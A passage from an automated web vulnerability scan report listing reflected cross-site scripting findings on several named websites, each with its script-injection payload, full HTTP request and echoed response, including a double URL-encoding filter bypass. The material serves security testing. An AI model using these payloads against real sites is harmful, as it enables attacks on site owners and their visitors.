Set-Cookie: info=75PfvcdfpL%252F0UPFxG06mOIitKllf7bSZghWOoeIb7CPzxLzS5LrFnQgpRhpWi%252BpFQnKrpaem5gEfIujJQGecvMIoZQ7RA7aRRDHlwebwhxlGHk9OcWkBnHgmcmlRumjPj%252B5qAvzVHhh%252Bi5bVukHcYzHN4y6vo0mnTyfDHbHilotcrXSVm7VvjjzTy1Yk5p90; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjAwO30%253D; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<h3>Sorry, the page 'favicon.icod0286<script>alert(1)</script>41cb61d962e' was not found.</h3>
...[SNIP]...

6.83. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.naturalhealers.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4548a"><script>alert(1)</script>59dfafabf4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4548a"><script>alert(1)</script>59dfafabf4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:29 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=27faac9e321bfea0669b23eafeee200c; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
Set-Cookie: info=75PfvcdfpL%252BLhbseSbe%252FXg3lSY0z3e6UOqyk47lmxL74FP7ujUOawM9vS4nN7p%252FxfPD7ImrWMkdh8HVIIeZlndLiVyafXt4IvqHgOuADGACeooJ%252BGImZAaLYU7ZnuzbCqbAd1LAml2aKTR5%252F8DoxIhooreGxpgbd2BJ4tNdIfArHZAhos008REY%252FIneiuUbV; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjA0O30%253D; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input onclick="open_subscribe_window('em_footer_widget','anh:favicon.ico4548a"><script>alert(1)</script>59dfafabf4d')" type="image" src="/img/subscriber/email_subscribe_btn.png" />
...[SNIP]...

6.84. http://www.ntra.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ntra.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d785d'-alert(1)-'27403f71a0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icod785d'-alert(1)-'27403f71a0a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:23:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.0
Expires: Tue, 03 May 2011 11:28:04 GMT
Cache-control:
Pragma:
Content-Length: 56452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
uContainer1").toggle();
    //$("#subMenuContainer1").slideUp("slow");
    // $('#subMenuContainer').html(data.output);
            //$("#subMenuContainer1").slideDown("slow");
}
var requequestURL = '/favicon.icod785d'-alert(1)-'27403f71a0a';
var urlFound=0;
$(document).ready(function(){
$('a[rev=NTRAMENU]').each(function() {
       if($(this).attr('href')==requequestURL){
               changeImage($(this).attr('parentId'));
               urlFound=1;
               return
...[SNIP]...

6.85. http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ontargetpayday.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae710"><script>alert(1)</script>d9f5089b7b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico?ae710"><script>alert(1)</script>d9f5089b7b4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ontargetpayday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:58 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_ssl/2.2.3 OpenSSL/0.9.8c
Set-Cookie: JSESSIONID=202343562D543C98EE85C48CFDA9FCB4; Path=/i
Content-Length: 301
Content-Type: text/html;charset=UTF-8

<html>
<head><title>www.ontargetpayday.com Home Page</title></head>
<frameset rows="100%,*" border="0">
<frame src="welcome.do?&ae710"><script>alert(1)</script>d9f5089b7b4=1&pid=1081&sid=SITE_APPLY_NOW" frameborder="0">
...[SNIP]...

6.86. http://www.osbornewood.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.osbornewood.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a3a"><script>alert(1)</script>8f0a1a4c44b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=349be7e19eac4cbc0b7aef57a8834603; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19261

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <HTML>
   <head>
   <meta name="robots" content="noindex,follow">
   <ti
...[SNIP]...
<a href="javascript:bookmarksite('http://www.osbornewood.com', 'http://www.osbornewood.com/favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b')">
...[SNIP]...

6.87. http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outsideinfo.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97c1b<script>alert(1)</script>7564d18a5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsideinfo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:45:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 315
Content-Type: text/html
Set-Cookie: hotvisitor=resp%5Fid=0&visitor%5Fid=%7B181737FE%2DE1B4%2D408E%2DA42A%2DCFF09AE4D61A%7D; expires=Wed, 01-Jan-2025 05:00:00 GMT; path=/
Set-Cookie: hotsession=cover%5Fimage%5Ftag=&issue%5Fdate=2011%2D05%2D01&pretty%5Fissue%5Fdate=May+2011&issue%5Fid=37768&survey%5Fset%5Fid=0&preview%5Fmode=False&eresponse=False&card%5Fsurvey%5Fset%5Fid=0&resp%5Fauthenticated=False&session%5Fid=%7B1301BBA9%2D579C%2D404E%2D8D21%2D0D2E02504486%7D; path=/
Set-Cookie: ASPSESSIONIDCSTDBDDB=FJGJHNNDGPODKCFEDJMOOGBI; path=/
Cache-control: private

   <html>
   <head>
   <title>404 Not Found</title>
   </head>
   <body bgcolor="White">
   <h1>404 Not Found</h1>
   <p> http://www.outsideinfo.com/favicon.ico?97c1b<script>alert(1)</script>7564d18a5db=1    </p>
...[SNIP]...

6.88. http://www.pordeo.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pordeo.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 was submitted in the REST URL parameter 1. This input was echoed as 94c4b<script>alert(1)</script>94ee537d775 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /94c4b%253cscript%253ealert%25281%2529%253c%252fscript%253e94ee537d775 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pordeo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TR=pordeo; expires=Tue, 03-May-2011 10:55:45 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 22405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
Po
...[SNIP]...
<b>94c4b<script>alert(1)</script>94ee537d775 </b>
...[SNIP]...

6.89. http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3e6"-alert(1)-"58a8dd981ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico2f3e6"-alert(1)-"58a8dd981ee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:20:10 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=0eea6ba9b5f95ddcb0241f0eac2a7a6d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:10 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:09 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29340

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico2f3e6"-alert(1)-"58a8dd981ee"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_c
...[SNIP]...

6.90. http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df43"-alert(1)-"d4e4a0237a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:19:59 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=dc467bb71902097ca9e3122fc19927cd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:19:59 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:58 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29343

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!--
s.pageName="www.prosolutionpills.com/favicon.ico?2df43"-alert(1)-"d4e4a0237a1=1"
s.server="www.prosolutionpills.com"
s.channel="World Niche"
s.prop7="www.prosolutionpills.com"
s.eVar1="N/A"
s.events=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s
...[SNIP]...

6.91. http://www.pusd.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pusd.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e662d<script>alert(1)</script>981d22cc7ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe662d<script>alert(1)</script>981d22cc7ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pusd.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:23:05 GMT
Server: Apache
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2797
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fe34b5953bf3ee77a7679654bb1fd7f0; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoe662d<script>alert(1)</script>981d22cc7ba</div>
...[SNIP]...

6.92. http://www.reflector.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reflector.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fddf"><script>alert(1)</script>126035c3afe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6fddf"><script>alert(1)</script>126035c3afe HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reflector.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:23:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS391af22a12335d38985f8e98d0435ca9=7863e333ea324158c8ecea1d13214430; expires=Thu, 26-May-2011 13:54:03 GMT; path=/; domain=.reflector.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:20:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<A href="/user/login?destination=favicon.ico6fddf"><script>alert(1)</script>126035c3afe">
...[SNIP]...

6.93. http://www.schneider.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.schneider.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5aad6<a%20b%3dc>16184a332c3 was submitted in the REST URL parameter 1. This input was echoed as 5aad6<a b=c>16184a332c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico5aad6<a%20b%3dc>16184a332c3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schneider.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:22 GMT
Server: Apache/2.0.52 (Oracle)
Content-type: text/html; charset=UTF-8
Content-Length: 12617
Connection: close
Set-Cookie: BIGipServerpool_http_www=1396367009.30750.0000; path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content
...[SNIP]...
<br/>
Error Message: Failed to locate document information for document with content ID 'favicon.ico5aad6<a b=c>16184a332c3'. The document is no longer in the system.<br/>
...[SNIP]...

6.94. http://www.sport-tube.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sport-tube.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2df6<script>alert(1)</script>d52a692c673 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof2df6<script>alert(1)</script>d52a692c673 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sport-tube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:47:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=916ce51099189b5098887df1bc172d87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 317

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icof2df6<script>alert(1)</script>d52a692c673 was not found on this server.<P>
...[SNIP]...

6.95. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.state-insurance-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a55'-alert(1)-'046e1e52bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico26a55'-alert(1)-'046e1e52bb8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=9eacc0d802f93d6461e0437462db0d2b; path=/; domain=.state-insurance-online.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<title>Get
...[SNIP]...
<![CDATA[ */
   try {
       var pageTracker = _gat._getTracker("UA-10767246-47");
       pageTracker._setDomainName('.state-insurance-online.com');
       pageTracker._trackPageview('/favicon.ico26a55'-alert(1)-'046e1e52bb8');
   }
   catch(err) {}
/* ]]>
...[SNIP]...

6.96. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.state-insurance-online.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e4ea"><script>alert(1)</script>8c6310db10a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e4ea"><script>alert(1)</script>8c6310db10a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.state-insurance-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
